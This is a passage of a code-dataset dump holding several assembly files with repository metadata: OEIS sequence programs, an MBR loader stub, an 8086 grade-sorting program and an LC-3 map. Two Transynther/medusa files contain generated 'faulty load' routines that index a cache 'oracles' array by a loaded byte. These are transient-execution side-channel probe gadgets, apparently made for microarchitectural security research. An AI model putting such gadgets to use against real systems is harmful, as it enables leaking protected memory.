] | 41 | 2021-02-22T19:00:34.000Z | 2021-08-28T10:47:47.000Z | programs/oeis/276/A276881.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 5 | 2021-02-24T21:14:16.000Z | 2021-08-09T19:48:05.000Z | ; A276881: Sums-complement of the Beatty sequence for 1 + sqrt(5).
; 1,2,5,8,11,14,15,18,21,24,27,28,31,34,37,40,41,44,47,50,53,54,57,60,63,66,69,70,73,76,79,82,83,86,89,92,95,96,99,102,105,108,109,112,115,118,121,124,125,128,131,134,137,138,141,144,147,150,151,154
mov $1,17
mul $1,$0
sub $1,1
div $1,21
add $1,1
mul $1,2
sub $1,1
add $1,$0
mov $0,$1
| 27.153846 | 198 | 0.660057 |
4e9b9219c26984f8a72b970f8c158ce876171bb8 | 4,361 | asm | Assembly | Transynther/x86/_processed/NONE/_xt_/i3-7100_9_0x84_notsx.log_21829_1097.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NONE/_xt_/i3-7100_9_0x84_notsx.log_21829_1097.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NONE/_xt_/i3-7100_9_0x84_notsx.log_21829_1097.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r13
push %rbp
push %rbx
push %rcx
push %rdi
push %rsi
lea addresses_UC_ht+0x1b27e, %rbx
nop
nop
nop
nop
dec %r10
mov $0x6162636465666768, %r13
movq %r13, (%rbx)
nop
nop
nop
sub %rbx, %rbx
lea addresses_normal_ht+0xa8c6, %rsi
lea addresses_A_ht+0x9442, %rdi
nop
nop
dec %rbp
mov $100, %rcx
rep movsl
add $16215, %r13
pop %rsi
pop %rdi
pop %rcx
pop %rbx
pop %rbp
pop %r13
pop %r10
ret
.global s_faulty_load
s_faulty_load:
push %r13
push %r14
push %r9
push %rbx
push %rdi
push %rdx
// Faulty Load
lea addresses_UC+0xc0fe, %rdx
nop
nop
nop
nop
inc %rdi
mov (%rdx), %r14
lea oracles, %r9
and $0xff, %r14
shlq $12, %r14
mov (%r9,%r14,1), %r14
pop %rdx
pop %rdi
pop %rbx
pop %r9
pop %r14
pop %r13
ret
/*
<gen_faulty_load>
[REF]
{'src': {'type': 'addresses_UC', 'same': False, 'size': 4, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'}
[Faulty Load]
{'src': {'type': 'addresses_UC', 'same': True, 'size': 8, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'dst': {'type': 'addresses_UC_ht', 'same': False, 'size': 8, 'congruent': 7, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'}
{'src': {'type': 'addresses_normal_ht', 'congruent': 3, 'same': False}, 'dst': {'type': 'addresses_A_ht', 'congruent': 1, 'same': False}, 'OP': 'REPM'}
{'37': 21829}
37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37
*/
| 54.5125 | 2,999 | 0.664297 |
55d0a7cd366a1e43051a9375fb648da20814947f | 1,097 | asm | Assembly | programs/oeis/199/A199213.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 22 | 2018-02-06T19:19:31.000Z | 2022-01-17T21:53:31.000Z | programs/oeis/199/A199213.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 41 | 2021-02-22T19:00:34.000Z | 2021-08-28T10:47:47.000Z | programs/oeis/199/A199213.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 5 | 2021-02-24T21:14:16.000Z | 2021-08-09T19:48:05.000Z | ; A199213: (3*5^n+1)/2.
; 2,8,38,188,938,4688,23438,117188,585938,2929688,14648438,73242188,366210938,1831054688,9155273438,45776367188,228881835938,1144409179688,5722045898438,28610229492188,143051147460938,715255737304688,3576278686523438,17881393432617188,89406967163085938,447034835815429688,2235174179077148438,11175870895385742188,55879354476928710938,279396772384643554688,1396983861923217773438,6984919309616088867188,34924596548080444335938,174622982740402221679688,873114913702011108398438,4365574568510055541992188,21827872842550277709960938,109139364212751388549804688,545696821063756942749023438,2728484105318784713745117188,13642420526593923568725585938,68212102632969617843627929688,341060513164848089218139648438,1705302565824240446090698242188,8526512829121202230453491210938,42632564145606011152267456054688,213162820728030055761337280273438,1065814103640150278806686401367188,5329070518200751394033432006835938,26645352591003756970167160034179688,133226762955018784850835800170898438,666133814775093924254179000854492188
mov $1,5
pow $1,$0
div $1,4
mul $1,6
add $1,2
mov $0,$1
| 109.7 | 1,015 | 0.915223 |
0ee65fa4b533620259d36cb439225c3cee848f0d | 525 | asm | Assembly | project/mbr.asm | dumitory-dev/mbr-password | d27fd62305addc7237fc7b7d19c2b2e9fe863fdf | [
"MIT"
] | 3 | 2021-12-10T13:04:17.000Z | 2022-02-02T06:55:50.000Z | project/mbr.asm | dumitory-dev/mbr-password | d27fd62305addc7237fc7b7d19c2b2e9fe863fdf | [
"MIT"
] | null | null | null | project/mbr.asm | dumitory-dev/mbr-password | d27fd62305addc7237fc7b7d19c2b2e9fe863fdf | [
"MIT"
] | null | null | null | org 0x7c00
start:
LOADER_ORIG_ADDR equ 0x100
LOADER_ORIG_SECTOR equ 0x1A
pushad
pushf
mov ah, 0x42 ; Read Sectors From Drive
lea si, [DAP]
int 0x13
jmp far 0x0:LOADER_ORIG_ADDR ; jump to MBR
; With LBA support
; http://en.wikipedia.org/wiki/INT_13H#INT_13h_AH.3D41h:_Check_Extensions_Present
DAP:
db 0x10
db 0
dw 1
dw LOADER_ORIG_ADDR ; sector
dw 0x0000 ; destination segment (0)
dq LOADER_ORIG_SECTOR ; segment
; Structure of a modern standard MBR
; Bootstrap code area (part 1)
X db (218 - X + start) dup (0)
| 16.935484 | 81 | 0.752381 |
8f789564d8a12d11eda0b63b6074e2b087bb8974 | 688 | asm | Assembly | oeis/159/A159522.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/159/A159522.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/159/A159522.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A159522: Numerator of Hermite(n, 3/16).
; Submitted by Christian Krause
; 1,3,-119,-1125,42321,702963,-24976551,-614805237,20534573985,691164284643,-21582336376791,-949437293473413,27539617738101489,1540954535989466835,-41203060308232477191,-2884999709417821999893,70454876663552890207041,6119844034878358126401987,-134950279515256014711315255,-14504971494905505167364123813,284684165296386112275826328721,37986779522847251565279635947443,-651270697748144115101582263759719,-108924583229582292753132201619278645,1590567184481789396599661579650776801
mov $1,1
lpb $0
sub $0,1
mul $1,8
sub $1,$2
add $2,$1
div $2,4
sub $1,$2
div $1,2
mul $2,$0
mul $2,128
lpe
mov $0,$1
| 38.222222 | 477 | 0.811047 |
90edfd5ab21af20a27b968f417e33fb5a698daa9 | 522 | asm | Assembly | src/boot/testA20.asm | wsngamerz/wsn_os | 9e35ff19ff642da3b8b15d6a7e155450abf318c8 | [
"MIT"
] | 1 | 2020-06-21T20:25:00.000Z | 2020-06-21T20:25:00.000Z | src/boot/testA20.asm | wsngamerz/wsn_os | 9e35ff19ff642da3b8b15d6a7e155450abf318c8 | [
"MIT"
] | null | null | null | src/boot/testA20.asm | wsngamerz/wsn_os | 9e35ff19ff642da3b8b15d6a7e155450abf318c8 | [
"MIT"
] | null | null | null | testA20:
pusha
mov ax, [0x7dfe]
push bx
mov bx, 0xffff
mov es, bx
pop bx
mov bx, 0x7e0e
mov dx, [es:bx]
cmp ax, dx
je .continue
popa
mov ax, 1
ret
.continue:
mov ax, [0x7dff]
push bx
mov bx, 0xffff
mov es, bx
pop bx
mov bx, 0x7e0f
mov dx, [es:bx]
cmp ax, dx
je .exit
popa
mov ax, 1
ret
.exit:
popa
xor ax, ax
ret
| 11.6 | 24 | 0.409962 |
7b704954c3a554f278f5fad283e18847e2aee398 | 2,255 | asm | Assembly | a8/ramdetect.asm | lybrown/fujiconvert | b9d8c78f25338b284f5c8a1b3c730950d127ca59 | [
"MIT"
] | 7 | 2018-05-31T19:57:08.000Z | 2021-09-21T13:54:49.000Z | a8/ramdetect.asm | lybrown/fujiconvert | b9d8c78f25338b284f5c8a1b3c730950d127ca59 | [
"MIT"
] | null | null | null | a8/ramdetect.asm | lybrown/fujiconvert | b9d8c78f25338b284f5c8a1b3c730950d127ca59 | [
"MIT"
] | 1 | 2021-01-22T15:41:48.000Z | 2021-01-22T15:41:48.000Z | extwindow equ $4000
banks
dontuse
org *+$100
bankindex
dta 0
prepnextbank
ldx bankindex
lda banks,x
sne:jmp main ; cancel load and run if banks are full
sta PORTB
inx
stx bankindex
sta rdscr+38
rts
; destroys addresses 0, 4000, 8000, C000 on RAMBO 256K
; destroys first byte in every extended RAM bank and 4000 in main mem
detectram
sei
mva #0 NMIEN
sta DMACTL
; clear dontuse table
tax
sta:rne dontuse,x+
; store 5A in every bank
lda #$5A
l1
stx PORTB
sta extwindow
:2 inx
bne l1
; store 5A in address zero to detect RAMBO 256K
sta 0
; loop through banks by X
l2
; skip if bank X has been marked as dont-use
ldy dontuse,x
bne c1
; write A5 into bank X
stx PORTB
mva #$A5 extwindow
; if address 0 contains A5 then mark as RAMBO 256K main mem alias
cmp 0
bne c0
sta dontuse,x
beq c1
c0
; loop through banks by Y = X+2 .. $FE
txa
tay
:2 iny
l3
sty PORTB
; if this bank contains A5 then mark as not unique
lda #$A5
cmp extwindow
sne:sta dontuse,y
:2 iny
bne l3
; write 5A back into bank X
stx PORTB
mvy #$5A extwindow
c1
:2 inx
bne l2
; enumerate unique banks
ldy #0
l4
lda dontuse,x
bne c2
cpx #$10
sne:ldx #$90 ; disable self-test in main ram bank
txa
; set OS enable bit on all banks
ora #1
sta banks,y+
c2
:2 inx
bne l4
; terminate list with 0
mva #0 banks,y
jsr displaycount
lda #0
sta:rne banks,y+
; display loading message
mwa #rddlist $230 ; SDLSTL
mva #0 $2C6 ; COLOR2
mva #15 $2C5 ; COLOR1
lda:rne VCOUNT
mva #$22 $22F ; SDMCTL
; restore OS ROM
mva #$FF PORTB
; restore interrupts
cli
mva #$40 NMIEN
rts
rddlist
:5 dta $70
dta $42,a(rdscr)
dta $70
dta $42,a(banks)
dta $2
dta $41,a(rddlist)
rdscr
; 0123456789012345678901234567890123456789
dta d' Loading into 00 detected banks... '
displaycount
tya
ldx #0
divmod
cmp #10
bcc done
sbc #10
inx
jmp divmod
done
adc #16
sta rdscr+18
txa
adc #16
sta rdscr+17
rts
| 16.459854 | 73 | 0.593792 |
e1e7de654a13241ed947d9095cb46793c47328f4 | 1,515 | asm | Assembly | reference/map.asm | mbartling/lc3Game | 438bf401f788f22e93ff5163b5460dfea4fbfe6d | [
"MIT"
] | 1 | 2018-07-07T05:12:29.000Z | 2018-07-07T05:12:29.000Z | reference/map.asm | mbartling/lc3Game | 438bf401f788f22e93ff5163b5460dfea4fbfe6d | [
"MIT"
] | null | null | null | reference/map.asm | mbartling/lc3Game | 438bf401f788f22e93ff5163b5460dfea4fbfe6d | [
"MIT"
] | null | null | null | .ORIG x3600
; Constants
;XDIM 8
;YDIM 10
;FOGOFWAR .FILL x2A ; A '*' char
;FLOORTILE .FILL x2E ; A '.' char
;WALL .FILL x23 ; A '#' char
;Think of map as a 10x8 block of characters (A string)
; Where each row is a array of characters followed by a new line
; This means we have (8 elements + 1 newline)*(number of columns) + 1 null char
; worth of allocated space for the map (91 mem locations total)
MAP .BLKW 8, x2E ; Set aside 8 location (xDim) and init them all to FLOORTILE
.FILL x0A ; \n
.BLKW 8, x2E ; Set aside 8 location (xDim) and init them all to FLOORTILE
.FILL x0A ; \n
.BLKW 8, x2E ; Set aside 8 location (xDim) and init them all to FLOORTILE
.FILL x0A ; \n
.BLKW 8, x2E ; Set aside 8 location (xDim) and init them all to FLOORTILE
.FILL x0A ; \n
.BLKW 8, x2E ; Set aside 8 location (xDim) and init them all to FLOORTILE
.FILL x0A ; \n
.BLKW 8, x2E ; Set aside 8 location (xDim) and init them all to FLOORTILE
.FILL x0A ; \n
.BLKW 8, x2E ; Set aside 8 location (xDim) and init them all to FLOORTILE
.FILL x0A ; \n
.BLKW 8, x2E ; Set aside 8 location (xDim) and init them all to FLOORTILE
.FILL x0A ; \n
.BLKW 8, x2E ; Set aside 8 location (xDim) and init them all to FLOORTILE
.FILL x0A ; \n
.BLKW 8, x2E ; Set aside 8 location (xDim) and init them all to FLOORTILE
.FILL x0A ; \n
.FILL x00 ; Null Termination
.END
| 40.945946 | 80 | 0.613861 |
3edb7a191b77c4ee4a739893d4d935a4fac9ddf4 | 4,971 | asm | Assembly | 8086ASM Sorting/studentsGradeSorting.asm | BlueLort/Mini-Projects | 3c06f2533358f413da42dbdbca52aa39474c9c29 | [
"MIT"
] | null | null | null | 8086ASM Sorting/studentsGradeSorting.asm | BlueLort/Mini-Projects | 3c06f2533358f413da42dbdbca52aa39474c9c29 | [
"MIT"
] | null | null | null | 8086ASM Sorting/studentsGradeSorting.asm | BlueLort/Mini-Projects | 3c06f2533358f413da42dbdbca52aa39474c9c29 | [
"MIT"
] | null | null | null | include 'emu8086.inc'
org 100h
jmp start
;-------------------------------------------------------------
;-------------------------------------------------------------
stringTemp db 100,?, 100 dup(' ')
const_ten dw 0Ah
tempMem dw 1
readNumIntoDX proc near
push ax
push bx
push cx
lea ax,stringTemp
mov dx,ax
mov ah, 0ah
int 21h
mov ah, 2
mov dl, 10 ;print newline
int 21h
mov dl, 13 ;return to start of line
int 21h
mov cl,stringTemp[1];n bytes were read
mov dx,0 ;dx has the out
reDo:
mov ax,0 ;reset ax , bx
mov bx,0
mov bl,stringTemp[1];
sub bl,cl
add bl,2
mov al,stringTemp[bx]
sub al,48;0 is 48 in ascii
mov bh,cl
sub bh,1
cmp bh,0
mov tempMem,dx
jle doneGetNum
reMul: mul const_ten
sub bh,1
cmp bh,0
jg reMul
doneGetNum:
mov dx,tempMem
add dx,ax
loop reDo
pop cx
pop bx
pop ax
ret
readNumIntoDX endp
;-------------------------------------------------------------
;-------------------------------------------------------------
studentsNum dw 25,?,25 dup(0000h)
studentsGrade dw 25,?,25 dup(0000h)
const_N dw 25 ;number of students -> should be 25
const_two db 2
start:
mov cx,const_N ;25 is number of students
readStudents:
lea ax,msg1
mov si,ax
call PRINT_STRING
call readNumIntoDX
mov bx,const_N
sub bx,cx
mov ax,bx
mul const_two
mov bx,ax
mov studentsNum[bx],dx
lea ax,msg2
mov si,ax
call PRINT_STRING
call readNumIntoDX
mov bx,const_N
sub bx,cx
mov ax,bx
mul const_two
mov bx,ax
mov studentsGrade[bx],dx
PUTC 0dh
PUTC 0ah
loop readStudents
jmp bubbleSort
;-------------------------------------------------------------
;-------------------------------------------------------------
iteOuter dw 1
iteInner dw 1
maxOuter dw 1
maxInner dw 1
bubbleSort:
mov iteOuter,0
mov ax,const_N
sub ax,1
mov maxOuter,ax
outerLoop:
mov iteInner,0
mov ax,const_N
sub ax,iteOuter
sub ax,1
mov maxInner,ax
innerLoop:
mov ax,iteInner
mul const_two
mov si,ax
mov bx,studentsGrade[si]
add si,2
mov dx,studentsGrade[si]
cmp bx,dx
jg finishInner
;swap grades
mov studentsGrade[si],bx
sub si,2
mov studentsGrade[si],dx
;swap numbers
mov bx,studentsNum[si]
add si,2
mov dx,studentsNum[si]
mov studentsNum[si],bx
sub si,2
mov studentsNum[si],dx
finishInner:
mov ax,iteInner
add ax,1
mov iteInner,ax
cmp ax,maxInner
jge finishOuter
jmp innerLoop
finishOuter:
mov ax,iteOuter
add ax,1
mov iteOuter,ax
cmp ax,maxOuter
jge doneSorting
jmp outerLoop
doneSorting:
PRINT 'Student Grade - '
PRINTN 'Student Number'
mov cx,const_N
printTables:
mov bx,const_N
sub bx,cx
mov ax,bx
mov dl,2
mul dl
mov bx,ax
mov ax,studentsGrade[bx]
call PRINT_NUM_UNS
PRINT ' - '
mov ax,studentsNum[bx]
call PRINT_NUM_UNS
PUTC 0dh
PUTC 0ah
loop printTables
ret
msg1 db 'Enter Student Number:',0
msg2 db 'Enter Student Grade:',0
DEFINE_PRINT_STRING
DEFINE_PRINT_NUM_UNS
END | 30.310976 | 77 | 0.366325 |
9e61cf462e35ffbd03c071c7bc73339de483e07d | 567 | asm | Assembly | data/pokemon/base_forms.asm | AtmaBuster/pokeplat-gen2 | fa83b2e75575949b8f72cb2c48f7a1042e97f70f | [
"blessing"
] | 6 | 2021-06-19T06:41:19.000Z | 2022-02-15T17:12:33.000Z | data/pokemon/base_forms.asm | AtmaBuster/pokeplat-gen2-old | 01e42c55db5408d72d89133dc84a46c699d849ad | [
"blessing"
] | null | null | null | data/pokemon/base_forms.asm | AtmaBuster/pokeplat-gen2-old | 01e42c55db5408d72d89133dc84a46c699d849ad | [
"blessing"
] | 3 | 2021-01-15T18:45:40.000Z | 2021-10-16T03:35:27.000Z | AltFormBaseIndex::
dw PICHU ; PICHU_B
dw DEOXYS ; DEOXYS_A
dw DEOXYS ; DEOXYS_D
dw DEOXYS ; DEOXYS_S
dw BURMY ; BURMY_S
dw BURMY ; BURMY_T
dw WORMADAM ; WORMADAM_S
dw WORMADAM ; WORMADAM_T
dw SHELLOS ; SHELLOS_E
dw GASTRODON ; GASTRODON_E
dw ROTOM ; ROTOM_FLY
dw ROTOM ; ROTOM_FRE
dw ROTOM ; ROTOM_GRS
dw ROTOM ; ROTOM_ICE
dw ROTOM ; ROTOM_WTR
dw GIRATINA ; GIRATINA_O
dw SHAYMIN ; SHAYMIN_S
dw CASTFORM ; CASTFORM_RN
dw CASTFORM ; CASTFORM_SN
dw CASTFORM ; CASTFORM_SW
dw CHERRIM ; CHERRIM_S
| 24.652174 | 27 | 0.679012 |
ee9de2edd1d28e38d6ef6fa0e5fef5c524beb387 | 344 | asm | Assembly | programs/oeis/040/A040884.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 22 | 2018-02-06T19:19:31.000Z | 2022-01-17T21:53:31.000Z | programs/oeis/040/A040884.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 41 | 2021-02-22T19:00:34.000Z | 2021-08-28T10:47:47.000Z | programs/oeis/040/A040884.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 5 | 2021-02-24T21:14:16.000Z | 2021-08-09T19:48:05.000Z | ; A040884: Continued fraction for sqrt(915).
; 30,4,60,4,60,4,60,4,60,4,60,4,60,4,60,4,60,4,60,4,60,4,60,4,60,4,60,4,60,4,60,4,60,4,60,4,60,4,60,4,60,4,60,4,60,4,60,4,60,4,60,4,60,4,60,4,60,4,60,4,60,4,60,4,60,4,60,4,60,4,60,4,60,4,60
mov $1,$0
cmp $0,0
sub $1,$0
gcd $1,2
add $1,12
add $0,$1
mul $0,$1
sub $0,168
add $0,$1
sub $0,12
mul $0,2
| 22.933333 | 189 | 0.598837 |
664b8531034fd2f12590e2ddd73376733ee8eabd | 4,258 | asm | Assembly | Transynther/x86/_processed/NONE/_xt_/i7-8650U_0xd2.log_21829_249.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NONE/_xt_/i7-8650U_0xd2.log_21829_249.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NONE/_xt_/i7-8650U_0xd2.log_21829_249.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r12
push %r13
push %rbx
push %rdx
lea addresses_UC_ht+0x1a245, %rbx
clflush (%rbx)
sub $33739, %r12
mov (%rbx), %r13
nop
cmp $2987, %rdx
pop %rdx
pop %rbx
pop %r13
pop %r12
ret
.global s_faulty_load
s_faulty_load:
push %r11
push %r14
push %r8
push %rax
push %rbp
push %rbx
push %rcx
// Load
lea addresses_WT+0x1ae91, %r14
nop
nop
nop
nop
xor %r11, %r11
mov (%r14), %ebp
nop
nop
nop
sub %rax, %rax
// Faulty Load
lea addresses_D+0x1aa11, %rax
nop
nop
nop
nop
nop
add %rbx, %rbx
movb (%rax), %r11b
lea oracles, %r8
and $0xff, %r11
shlq $12, %r11
mov (%r8,%r11,1), %r11
pop %rcx
pop %rbx
pop %rbp
pop %rax
pop %r8
pop %r14
pop %r11
ret
/*
<gen_faulty_load>
[REF]
{'OP': 'LOAD', 'src': {'type': 'addresses_D', 'size': 4, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': False}}
{'OP': 'LOAD', 'src': {'type': 'addresses_WT', 'size': 4, 'AVXalign': True, 'NT': False, 'congruent': 3, 'same': False}}
[Faulty Load]
{'OP': 'LOAD', 'src': {'type': 'addresses_D', 'size': 1, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': True}}
<gen_prepare_buffer>
{'OP': 'LOAD', 'src': {'type': 'addresses_UC_ht', 'size': 8, 'AVXalign': False, 'NT': False, 'congruent': 2, 'same': False}}
{'36': 21829}
36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 